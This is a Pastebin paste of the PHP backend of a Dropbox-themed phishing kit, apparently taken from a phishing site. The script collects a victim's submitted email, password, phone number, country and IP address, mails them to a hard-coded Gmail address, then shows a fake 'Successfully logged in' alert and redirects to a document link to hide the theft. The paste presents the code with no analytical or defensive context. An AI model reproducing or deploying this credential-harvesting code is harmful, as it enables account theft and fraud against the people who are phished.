Guest User

https://coffeeee.gq/drop/dropbox/jeff.php

a guest
Feb 15th, 2018
27
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.85 KB | None | 0 0
  1. <?php
  2. $ip = getenv("REMOTE_ADDR");
  3. $datamasii=date("D M d, Y g:i a");
  4. $message .= "Dropbox Inbox"."\n";
  5. $message .= "User : ".$_POST['email']."\n";
  6. $message .= "Password: " .$_POST['pass']."\n";
  7. $message .= "Phone: " .$_POST['phone']."\n";
  8. $message .= "IP: ".$ip."\n";
  9. $message .= "Country: ".$_POST['country']."\n";
  10. mail($recipient,$subject,$message);
  11.  
  12. $recipient = "scottfrank261@gmail.com";
  13. $subject = "2017";
  14. $headers = "From: NGUYEN
  15. scottfrank261@gmail.com>";
  16. $headers .= $_POST['eMailAdd']."\n";
  17. $headers .= "MIME-Version: 1.0\n";
  18. mail("", "yahoo", $message);
  19. if (mail($recipient,$subject,$message,$headers))
  20.  
  21. {
  22. ?>
  23.  
  24. <script language=javascript>
  25. alert('Successfully logged in!!!');
  26. window.location=' http://docdro.id/nOokJKX';
  27. </script>
  28. <?
  29.  
  30. }
  31. else
  32. {
  33. echo "ERROR! Please go back and try again.";
  34. }
  35.  
  36. ?>
Add Comment
Please, Sign In to add comment